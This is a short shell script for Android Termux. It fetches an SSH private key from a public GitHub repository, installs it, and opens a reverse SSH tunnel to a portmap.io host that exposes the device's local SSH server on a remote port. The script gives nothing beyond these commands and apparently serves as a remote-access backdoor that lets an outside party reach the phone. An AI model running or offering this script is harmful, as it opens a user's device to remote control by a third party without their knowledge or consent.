#!/bin/sh
wget -O /data/local/tmp/fordkey https://github.com/Androidmate/orion/raw/master/res/ford/fordkey

mv /data/local/tmp/fordkey /data/data/com.termux/files/home/.ssh/
chmod 600 /data/data/com.termux/files/home/.ssh/fordkey

/data/data/com.termux/files/usr/bin/ssh -i /data/data/com.termux/files/home/.ssh/fordkey noah.first@noah-33978.portmap.io -N -R 33978:localhost:8022
